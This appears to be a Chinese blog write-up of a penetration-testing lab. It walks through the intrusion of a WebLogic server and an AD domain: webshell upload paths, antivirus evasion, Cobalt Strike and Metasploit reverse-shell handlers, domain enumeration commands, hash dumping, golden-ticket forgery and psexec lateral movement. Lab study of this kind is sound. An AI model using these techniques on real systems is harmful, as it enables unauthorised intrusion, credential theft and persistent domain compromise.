赞
踩
配置信息
DC
IP:10.10.10.10
OS:Windows 2012(64)
应用:AD域
WEB
IP1:10.10.10.80
IP2:192.168.47.131
OS:Windows 2008(64)
应用:Weblogic 10.3.6MSSQL 2008
PC
IP1:10.10.10.201
IP2:192.168.47.130
OS:Windows 7(32)
攻击机
IP:192.168.47.128
WEB,PC 有360和防火墙
网络配置:
内网默认网段为10.10.10.1/24
DMZ默认网段为 192.168.111.1/24
管理员 Administrator / 1qaz@WSX
三台机子的默认密码都是1qaz@WSX,但是web这一台服务器默认密码登录会错误,解决办法是选择v1.3的快照,报错之后点击放弃,然后重启web虚拟机就可以进了。
同时需要在web机开启weblogic服务
首先添加一个vm2的内网自定义,设置子网为10.10.10.1/24
当虚拟机开启时,会采用已经设定过的ip地址(必须符合10.10.10开头
将DC,PC,WEB 设为 vm2 (内网环境)
内网设置好了,外网这样设置
我设置的外网连接方式为NAT
将 攻击机,PC,WEB 外网设置为NAT,为了与kali在同一网段
PC与WEB做修改如下:
Dc:
Pc
Win
开启WEB的服务:管理员身份运行
C:\Oracle\Middleware\user_projects\domains\base_domain
Nmap端口扫描
nmap -T4 -A -p 1-65535 192.168.163.137
由nmap扫描结果可知:
端口扫描 | 80,1433,3389,,7001,60966等 |
服务版本识别 | IIS httpd 7.5,SQL Server 2008 R2 SP2,远程桌面服务,WebLogic Server |
操作系统信息识别 | Windows Server 2008 R2 - 2012 |
域 | de1ay.com |
工具检测发现漏洞
Dir查看路劲
查看进程
weblogic上传木马路径选择:weblogic上传路径
方法1:把shell写到控制台images目录中:
\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp //目录上传木马
访问 http://192.168.163.137:7001/console/framework/skins/wlsconsole/images/shell.jsp
方法2:写到uddiexplorer目录中
\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\随机字符\war\shell.jsp //目录写入木马,
方法3:在应用安装目录中
\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\项目名\随机字符\war\shell.jsp //目录写入木马,
访问 http://*.*.*.*:7001/项目名/shell.jsp
这里选择第一种
上传木马
被360查杀了
给冰蝎做免杀
GitHub - Tas9er/ByPassBehinder: ByPassBehinder / 冰蝎WebShell免杀生成 / Code By:Tas9er
生成木马
C:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp
查看生成成功了
但是太老了还是被查杀了
只能关闭360了不然免杀都不会做
冰蝎尝试一直失败
用哥斯拉
连接成了
cs生成监听器反弹到cs客户端
哥斯拉上传cs木马文件
Cs端收到回连
接着用ms-15权限提升
1). 本机信息收集
shell Systeminfo //查看操作系统信息
shell Ipconfig /all //查询本机ip段,所在域等
shell Whoami //查看当前用户权限
shell Net user //查看本地用户
shell Net localgroup administrators //查看本地管理员组(通常 包含域用户)
得知web服务器为Windows server 2008 有两个网段
net config workstation // 查看当前计算机名,全名,用户名,系统版本,工作站域,登陆的域等
net view /domain // 查看域
net time /domain // 主域服务器会同时作为时间服务器
net user /domain // 查看域用户
net group /domain // 查看域内用户组列表
net group "domain computers" /domain // 查看域内的机器
net group "domain controllers" /domain // 查看域控制器组
net group "Enterprise Admins" /domain // 查看域管理员组
域名为de1ay.com 存在两台域主机web和pc 域控为DCde1ay.com主机名为DC,域管理员为Administrator
接下来将通过 Win7 跳板机,横向渗透拿下内网域内的域成员主机和域控主机。
服务器安装msf
chmod 755 msfinstall.sh && ./msfinstall.sh
会话转移
(1)msfconsole // 打开 MSF 工具
(2)use exploit/multi/handler // 设置 监听 模块.
(3)set payload windows/meterpreter/reverse_http // 设置 payload
(4)set lport 4444 // 设置一个端口(和上面的监听一样的端口)
(5)set lhost 0.0.0.0 // 设置本地的 IP 地址
(6)exploit // 进行测试
Cs生成外联监听器
权力委派上线成功
新建会话
Cs抓取密码凭证
记录域名DE1AY.com的SID值
Authentication Id : 0 ; 158137 (00000000:000269b9)
Session : Service from 0
User Name : mssql
Domain : DE1AY
Logon Server : DC
Logon Time : 2024/8/5 7:02:10
SID : S-1-5-21-2756371121-2868759905-3853650604-2103
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
de1ay:1000:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
制作黄金票据
Administrator
DE1AY.com
S-1-5-21-2756371121-2868759905-3853650604-2103
31d6cfe0d16ae931b73c59d7e0c089c0
用于权限维持
端口扫描
目标列表查看
创建smb监听
右击会话—jump—psexec64(PC为32位,需要使用psexec)
10.10.10.10上线成功了
再次端口扫描发现
10.10.10.201
同样的方法上线成功了
免杀不会,外网打点信息收集不全,横向不熟练,渗透框架还不够结实
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。